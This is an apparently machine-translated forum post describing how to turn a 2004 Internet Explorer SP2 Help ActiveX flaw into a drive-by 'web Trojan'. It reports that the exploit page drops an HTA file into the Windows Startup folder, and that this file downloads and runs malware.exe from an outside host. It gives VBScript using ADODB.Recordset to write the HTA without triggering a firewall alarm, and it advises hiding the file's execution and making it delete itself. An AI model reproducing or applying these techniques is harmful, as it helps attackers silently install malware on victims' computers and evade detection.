Exploitation: Microsoft Internet Explorer SP2 Remote Arbitrary Command Execution Vulnerability Release Date: 2004-12-23 Affected System: Microsoft Internet Explorer 6.0SP2 - Microsoft Windows XP Professional SP2 - Microsoft Windows XP Home SP2 Microsoft Internet Explorer combines various vulnerabilities such as Help ActiveX controls. Remote attackers can exploit this vulnerability without requiring user interaction to execute arbitrary files and cause malicious code execution. See: _bug&do=vIEw&bug_id=7272&keyWord=" >Green League ice fox prodigal personal test and analysis Because the published test page is for the English version of the winxp system, so before using the Chinese system test, you must first create the following directory C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\ I used the test page given to test and found that if a firewall is installed, the application alg.exe will be prompted to access the network. After selecting Allow, view C:\\Documents and Settings\\All Users\\Start Menu\\ Programs\\Startup\\ directory found Was written to a file "Microsoft Office.hta", running "Microsoft Office.hta", found automatically downloaded from http://freehost07.websamba.com/greyhats/malware.exe and ran a beautiful flame DEMO, C drive The malware.exe program appears below the root directory. [It should be noted that the firewall does not have an alarm when running Microsoft Office.hta]! I looked at the code and found the firewall alarm because the code in writehta.txt was obtained by accessing the remote database. Into the code in Microsoft Office.hta, if we do not access the database and directly write the hta code into the script, you can not cause the alarm of the firewall! Ha ha method is to call ADODB.Recordset, the code used is written as A record, I also found the code code on the Internet as follows: on error resume next set evanchik = CreateObject("ADODB.Recordset") With evanchik .FIElds.Append "evanchik", 200, "3000" Call .Open Call .AddNew . FIElds("evanchik").Value = "meaning less shit i had to put here" Call .AddNew .FIElds("evanchik").Value = " Write the specific code to be written to the startup directory "Call.Update End With evanchik.Save "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\Microsoft Office.hta", adPersistXML evanchik.Close The firewall problem, the next step is to see how to conceal the operation of the hta file after booting, I will not write specifically, please refer to the use of the previous object vulnerability code on the Internet, which is now called "no flashing web Trojan" on the Internet! Need to pay attention to, hta is best to add the automatic delete function, so it will not be easily found after running once! In addition, the webpage Trojan made by this vulnerability will open a help file, if you feel not very good, you can use the help control The Close parameter in the section is automatically closed! At this point, an XPsp2 web Trojan is successfully completed! Inadequacies: 1. Because I did not find a way to run automatically, only write to the startup folder, wait for the machine to restart after running hta file , easy to be cleared after discovery, so that the Trojan can not be downloaded and run 2. Because you want to call the local htm or chm file, get the file permission, so When the system is not installed by default under the C drive, the file can not be written!